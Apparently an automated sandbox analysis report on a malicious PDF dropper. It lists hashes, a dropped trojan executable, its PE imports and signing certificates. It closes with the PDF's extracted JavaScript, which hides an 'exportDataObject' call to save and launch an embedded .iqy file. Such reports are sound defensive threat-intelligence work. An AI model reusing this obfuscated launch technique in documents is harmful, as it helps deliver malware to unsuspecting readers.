VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Trojan, Dropper, Downloader
2c5729e17b64cd4e905ccfeabbc913ed945e17625c35ec1d6932194aae83d7c6 (SHA256)
DOC_443353149786_10082018.pdf
PDF Document
Created at 2018-08-10 12:36:00
Notifications (2/2)
The overall sleep time of all monitored processes was truncated from "20 minutes, 15 seconds" to "2 minutes" to reveal dormant functionality.
The operating system was rebooted during the analysis.
This is a filtered view
This list contains only the embedded files and created files
Filename | Category | Type | Severity |
---|---|---|---|
C:\Users\BMe1N39jU1 6criBQ\AppData\Local\Temp\cmd_.exe | Created File | Binary | Blacklisted |
File Reputation Information
Severity | Blacklisted |
First Seen | 2018-08-10 10:35 (UTC+2) |
Last Seen | 2018-08-10 13:00 (UTC+2) |
Names | Win32.Trojan.Wonton |
Families | Wonton |
Classification | Trojan |
PE Information
Image Base | 0x400000 |
Entry Point | 0x407209 |
Size Of Code | 0x11600 |
Size Of Initialized Data | 0x6600 |
File Type | executable |
Subsystem | windows_gui |
Machine Type | i386 |
Compile Timestamp | 2018-08-09 13:23:42+00:00 |
Sections (5)
Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy |
---|---|---|---|---|---|---|
.text | 0x401000 | 0x11581 | 0x11600 | 0x400 | cnt_code, mem_execute, mem_read | 6.66 |
.rdata | 0x413000 | 0x31d4 | 0x3200 | 0x11a00 | cnt_initialized_data, mem_read | 5.2 |
.data | 0x417000 | 0x54e0 | 0x1600 | 0x14c00 | cnt_initialized_data, mem_read, mem_write | 4.71 |
.rsrc | 0x41d000 | 0x1b4 | 0x200 | 0x16200 | cnt_initialized_data, mem_read | 5.11 |
.reloc | 0x41e000 | 0x1a12 | 0x1c00 | 0x16400 | cnt_initialized_data, mem_discardable, mem_read | 4.56 |
Imports (3)
KERNEL32.dll (71)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GlobalAlloc | 0x0 | 0x413008 | 0x15b6c | 0x1456c | 0x2b3 |
GlobalFree | 0x0 | 0x41300c | 0x15b70 | 0x14570 | 0x2ba |
GetTickCount | 0x0 | 0x413010 | 0x15b74 | 0x14574 | 0x293 |
GetSystemTime | 0x0 | 0x413014 | 0x15b78 | 0x14578 | 0x277 |
CreateDirectoryW | 0x0 | 0x413018 | 0x15b7c | 0x1457c | 0x81 |
Sleep | 0x0 | 0x41301c | 0x15b80 | 0x14580 | 0x4b2 |
LoadLibraryW | 0x0 | 0x413020 | 0x15b84 | 0x14584 | 0x33f |
GetLastError | 0x0 | 0x413024 | 0x15b88 | 0x14588 | 0x202 |
lstrcatW | 0x0 | 0x413028 | 0x15b8c | 0x1458c | 0x53f |
lstrcpyW | 0x0 | 0x41302c | 0x15b90 | 0x14590 | 0x548 |
CloseHandle | 0x0 | 0x413030 | 0x15b94 | 0x14594 | 0x52 |
CreateFileW | 0x0 | 0x413034 | 0x15b98 | 0x14598 | 0x8f |
WriteConsoleW | 0x0 | 0x413038 | 0x15b9c | 0x1459c | 0x524 |
lstrlenW | 0x0 | 0x41303c | 0x15ba0 | 0x145a0 | 0x54e |
MultiByteToWideChar | 0x0 | 0x413040 | 0x15ba4 | 0x145a4 | 0x367 |
GetProcAddress | 0x0 | 0x413044 | 0x15ba8 | 0x145a8 | 0x245 |
GetModuleHandleW | 0x0 | 0x413048 | 0x15bac | 0x145ac | 0x218 |
ExitProcess | 0x0 | 0x41304c | 0x15bb0 | 0x145b0 | 0x119 |
DecodePointer | 0x0 | 0x413050 | 0x15bb4 | 0x145b4 | 0xca |
HeapFree | 0x0 | 0x413054 | 0x15bb8 | 0x145b8 | 0x2cf |
EncodePointer | 0x0 | 0x413058 | 0x15bbc | 0x145bc | 0xea |
GetSystemTimeAsFileTime | 0x0 | 0x41305c | 0x15bc0 | 0x145c0 | 0x279 |
GetCommandLineA | 0x0 | 0x413060 | 0x15bc4 | 0x145c4 | 0x186 |
HeapSetInformation | 0x0 | 0x413064 | 0x15bc8 | 0x145c8 | 0x2d3 |
GetStartupInfoW | 0x0 | 0x413068 | 0x15bcc | 0x145cc | 0x263 |
TerminateProcess | 0x0 | 0x41306c | 0x15bd0 | 0x145d0 | 0x4c0 |
GetCurrentProcess | 0x0 | 0x413070 | 0x15bd4 | 0x145d4 | 0x1c0 |
UnhandledExceptionFilter | 0x0 | 0x413074 | 0x15bd8 | 0x145d8 | 0x4d3 |
SetUnhandledExceptionFilter | 0x0 | 0x413078 | 0x15bdc | 0x145dc | 0x4a5 |
IsDebuggerPresent | 0x0 | 0x41307c | 0x15be0 | 0x145e0 | 0x300 |
GetCPInfo | 0x0 | 0x413080 | 0x15be4 | 0x145e4 | 0x172 |
InterlockedIncrement | 0x0 | 0x413084 | 0x15be8 | 0x145e8 | 0x2ef |
InterlockedDecrement | 0x0 | 0x413088 | 0x15bec | 0x145ec | 0x2eb |
GetACP | 0x0 | 0x41308c | 0x15bf0 | 0x145f0 | 0x168 |
GetOEMCP | 0x0 | 0x413090 | 0x15bf4 | 0x145f4 | 0x237 |
IsValidCodePage | 0x0 | 0x413094 | 0x15bf8 | 0x145f8 | 0x30a |
TlsAlloc | 0x0 | 0x413098 | 0x15bfc | 0x145fc | 0x4c5 |
TlsGetValue | 0x0 | 0x41309c | 0x15c00 | 0x14600 | 0x4c7 |
TlsSetValue | 0x0 | 0x4130a0 | 0x15c04 | 0x14604 | 0x4c8 |
TlsFree | 0x0 | 0x4130a4 | 0x15c08 | 0x14608 | 0x4c6 |
SetLastError | 0x0 | 0x4130a8 | 0x15c0c | 0x1460c | 0x473 |
GetCurrentThreadId | 0x0 | 0x4130ac | 0x15c10 | 0x14610 | 0x1c5 |
InitializeCriticalSectionAndSpinCount | 0x0 | 0x4130b0 | 0x15c14 | 0x14614 | 0x2e3 |
DeleteCriticalSection | 0x0 | 0x4130b4 | 0x15c18 | 0x14618 | 0xd1 |
LeaveCriticalSection | 0x0 | 0x4130b8 | 0x15c1c | 0x1461c | 0x339 |
EnterCriticalSection | 0x0 | 0x4130bc | 0x15c20 | 0x14620 | 0xee |
WriteFile | 0x0 | 0x4130c0 | 0x15c24 | 0x14624 | 0x525 |
GetStdHandle | 0x0 | 0x4130c4 | 0x15c28 | 0x14628 | 0x264 |
GetModuleFileNameW | 0x0 | 0x4130c8 | 0x15c2c | 0x1462c | 0x214 |
HeapCreate | 0x0 | 0x4130cc | 0x15c30 | 0x14630 | 0x2cd |
HeapSize | 0x0 | 0x4130d0 | 0x15c34 | 0x14634 | 0x2d4 |
HeapAlloc | 0x0 | 0x4130d4 | 0x15c38 | 0x14638 | 0x2cb |
RaiseException | 0x0 | 0x4130d8 | 0x15c3c | 0x1463c | 0x3b1 |
GetModuleFileNameA | 0x0 | 0x4130dc | 0x15c40 | 0x14640 | 0x213 |
FreeEnvironmentStringsW | 0x0 | 0x4130e0 | 0x15c44 | 0x14644 | 0x161 |
WideCharToMultiByte | 0x0 | 0x4130e4 | 0x15c48 | 0x14648 | 0x511 |
GetEnvironmentStringsW | 0x0 | 0x4130e8 | 0x15c4c | 0x1464c | 0x1da |
SetHandleCount | 0x0 | 0x4130ec | 0x15c50 | 0x14650 | 0x46f |
GetFileType | 0x0 | 0x4130f0 | 0x15c54 | 0x14654 | 0x1f3 |
QueryPerformanceCounter | 0x0 | 0x4130f4 | 0x15c58 | 0x14658 | 0x3a7 |
GetCurrentProcessId | 0x0 | 0x4130f8 | 0x15c5c | 0x1465c | 0x1c1 |
LCMapStringW | 0x0 | 0x4130fc | 0x15c60 | 0x14660 | 0x32d |
GetStringTypeW | 0x0 | 0x413100 | 0x15c64 | 0x14664 | 0x269 |
RtlUnwind | 0x0 | 0x413104 | 0x15c68 | 0x14668 | 0x418 |
SetFilePointer | 0x0 | 0x413108 | 0x15c6c | 0x1466c | 0x466 |
GetConsoleCP | 0x0 | 0x41310c | 0x15c70 | 0x14670 | 0x19a |
GetConsoleMode | 0x0 | 0x413110 | 0x15c74 | 0x14674 | 0x1ac |
HeapReAlloc | 0x0 | 0x413114 | 0x15c78 | 0x14678 | 0x2d2 |
IsProcessorFeaturePresent | 0x0 | 0x413118 | 0x15c7c | 0x1467c | 0x304 |
SetStdHandle | 0x0 | 0x41311c | 0x15c80 | 0x14680 | 0x487 |
FlushFileBuffers | 0x0 | 0x413120 | 0x15c84 | 0x14684 | 0x157 |
USER32.dll (1)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
wsprintfW | 0x0 | 0x413128 | 0x15c8c | 0x1468c | 0x333 |
ADVAPI32.dll (1)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
RegEnumKeyW | 0x0 | 0x413000 | 0x15b64 | 0x14564 | 0x250 |
Digital Signatures (2)
Certificate: CINECTIC LIMITED
Issued by | CINECTIC LIMITED |
Parent Certificate | thawte SHA256 Code Signing CA |
Country Name | GB |
Valid From | 2017-10-31 00:00:00+00:00 |
Valid Until | 2018-10-31 23:59:59+00:00 |
Algorithm | sha256_rsa |
Serial Number | B3 08 2B 6F C3 F7 DE 00 A2 E2 68 B0 71 5F 76 3 |
Thumbprint | BB 58 21 0B 6A B0 99 55 19 3C EA 32 89 40 A6 05 9F 49 B9 48 |
Certificate: thawte SHA256 Code Signing CA
Issued by | thawte SHA256 Code Signing CA |
Country Name | US |
Valid From | 2013-12-10 00:00:00+00:00 |
Valid Until | 2023-12-09 23:59:59+00:00 |
Algorithm | sha256_rsa |
Serial Number | 71 A0 B7 36 95 DD B1 AF C2 3B 2B 9A 18 EE 54 CB |
Thumbprint | D0 0C FD BF 46 C9 8A 83 8B C1 0D C4 E0 97 AE 01 52 C4 61 BC |
C:\Users\BMe1N39jU1 6criBQ\Desktop\DOC_443353149786_10082018.pdf | Sample File | | Unknown |
PDF Information
Title | - |
Subject | - |
Author | - |
Creator | - |
Keywords | - |
Producer | iTextSharp™ 5.5.10 ©2000-2016 iText Group NV (AGPL-version) |
Page Count | 1 |
Encrypted | |
Create Time | 2018-08-10 11:50:18+00:00 |
Modify Time | 2018-08-10 11:50:18+00:00 |
Embedded JavaScript (2)
```javascript
// Acrobat JavaScript extracted from the PDF by the sandbox.
// The method name is assembled in an object and invoked through this[...],
// so "exportDataObject" never appears as a direct call in the script.
function rfunc900(){
    var hadapet = {};
    hadapet['nLaunch'] = 2;              // save the attachment and launch it
    hadapet['cName'] = '10082016.iqy';   // embedded file to export (Excel web query)
    hadapet['r2'] = 'exportDataObject';  // Doc.exportDataObject, resolved at runtime
    this[hadapet['r2']](hadapet);
}
rfunc900();
```
bea0276c51bd6dbccb64110a8655fd623cbb9ebf6e0105c57f62e53e209361b6 | Embedded File | Text | Unknown |